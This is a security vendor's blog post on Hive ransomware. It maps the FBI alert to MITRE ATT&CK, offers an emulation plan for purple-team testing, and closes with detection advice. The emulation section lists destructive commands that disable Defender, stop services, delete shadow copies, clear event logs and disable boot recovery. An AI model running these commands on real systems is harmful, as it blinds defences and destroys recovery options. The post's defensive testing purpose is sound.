Threat Thursday - Hive Ransomware

The FBI released a Flash Alert on August 25, 2021 warning organizations about the Hive ransomware that has affected at least 28 organizations including Memorial Health. This ransomware is new, first observed in June 2021, but operates like most ransomware we track: disabling endpoint security solutions and services, deleting backups and event logs, exfiltrating and encrypting data, and extorting the target into paying a ransom before getting access back to their systems.

As usual for #ThreatThursday, we will consume the Cyber Threat Intelligence and map it to MITRE ATT&CK, we create and share an adversary emulation plan on the SCYTHE GitHub, and discuss ways to prevent, detect, and respond to this threat. 

Cyber Threat Intelligence

We first heard of the Hive Ransomware when Memorial Health released a statement about the attack. Unfortunately the information provided did not include actionable intelligence to emulate the new threat. OnAugust 25, 2021, the FBI released a Flash Alert with more details but without MITRE ATT&CK mapping:

Hive ransomware, which was first observed in June 2021 and likely operates as an affiliate-based ransomware, employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. Hive ransomware uses multiple mechanisms to compromise business networks, including phishing emails with malicious attachments to gain access and Remote Desktop Protocol (RDP) to move laterally once on the network.
After compromising a victim network, Hive ransomware actors exfiltrate data and encrypt files on the network. The actors leave a ransom note in each affected directory within a victim’s system, which provides instructions on how to purchase the decryption software. The ransom note also threatens to leak exfiltrated victim data on the Tor site, “HiveLeaks.”

Following our Purple Team Exercise Framework, the next step is to extract the tactics, techniques, and procedures from the Cyber Threat Intelligence and analyze & organize them. As usual, we provide a MITRE ATT&CK Navigator layer for Hive matched to the TTPs.

Tactics Techniques
Description The Hive ransomware has affected at least 28 organizations including Memorial Health since June 2021. It operates like most ransomware: disabling endpoint security solutions and services, deleting backups and event logs, exfiltrating and encrypting data, and extorting the target into paying a ransom before getting access back to their systems.
Initial Access T1566 - Phishing
Execution T1059.001 - Command and Scripting Interpreter: PowerShell
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
T1047 - Windows Management Instrumentation
Command and Control T1071 - Application Layer Protocol: HTTPS
T1573 - Encrypted Channel: HTTPS
T1219 - Remote Access Software
Defense Evasion T1070.001 - Indicator Removal on Host: Clear Windows Event Logs
T1562.001 - Impair Defenses: Disable or Modify Tools
Collection T1074.001 - Local Data Staging
T1560 - Archive Collected Data
Exfiltration T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage
Impact T1486 - Data Encrypted for Impact
T1489 - Service Stop
T1490 - Inhibit System Recovery
T1491.001 - Internal Defacement


Adversary Emulation Plan

The FBI alert provided some procedures which are always welcome from Cyber Threat Intelligence providers. We packed the plan up and shared it in our Community Threats GitHub. We added a note as this threat is destructive: 

Note this threat, if executed with administrative privileges, will disable services, delete Volume Shadow Copies, delete Windows Event Logs, and modify bootup. For testing purposes, you may want to test in non-production, make an offline backup, and/or or take a snapshot.

To execute with SCYTHE:

  1. Download and import the threat in JSON format to your SCYTHE instance
  2. Download the Virtual File System (VFS) files under the VFS folder
  3. Upload the VFS files to your SCYTHE VFS in the following location: VFS:/shared/Hive
  4. Create a new campaign, selecting HTTPS, and configure your HTTPS communication options.
  5. Import from Existing Threat: Hive
  6. Launch Campaign
  7. Download the EXE and rename it to Winlo_dump_64_SCY.exe

To execute this attack chain manually, you can open an elevated command line interface and run:

  • powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  • sc stop LanmanWorkstation
  • sc stop SamSs
  • sc stop SDRSVC
  • sc stop SstpSVc
  • sc stop UI0Detect
  • sc stop Vmicvss
  • sc stop Vmss
  • sc stop VSS
  • sc stop Wbengine
  • sc stop Unistoresvc
  • wmic.exe SHADOWCOPY /nointeractive
  • wmic.exe shadowcopy delete
  • wevtutil.exe cl system
  • wevtutil.exe cl security
  • wevtutil.exe cl application
  • bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  • bcdedit.exe /set {default} recoveryenabled norun

Of course the manual method will be manual and not include a number of the TTPs that would make this more realistic. If you do use SCYTHE, you will see the client have data exfiltrated and encrypted, a hive key file, and the ransom note open on your desktop:

Detect & Respond

Like most ransomware, you will want to be able to detect and respond to the attack on the “left of boom” where boom is exfiltration and encryption. Most ransomware is very noisy. Here are some items to consider detecting to respond to Hive ransomware before boom:

  • Detecting Command and Control is an area where most Endpoint Detection and Response solutions lack. Consider some of the Network Detection and Response solutions for this use case which is prevalent in most attacks.
  • Detect attempts of escalation of privilege - Hive requires administrative privileges to stop services, clear logs, and modify the bootup process.
  • Train your team to respond to alerts quickly as a way to limit impact.
  • For preventive controls, check out the recommendation from the FBI Alert.

Conclusion

You can use SCYTHE to emulate the Hive Ransomware recently alerted by the FBI to attack, detect, and respond to adversary behaviors. As ransomware evolves, the indicators of compromise will change leaving you in a reactive vs. a proactive stance. In this post, we took the FBI alert, extracted the tactics, techniques, and procedures (TTPs), and mapped them to MITRE ATT&CK. We then created and shared the Hive ransomware emulation plan you can easily import into SCYTHE to test your people, process, and technology. If you are not a SCYTHE customer or would like help running an adversary emulation, let us know.

This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.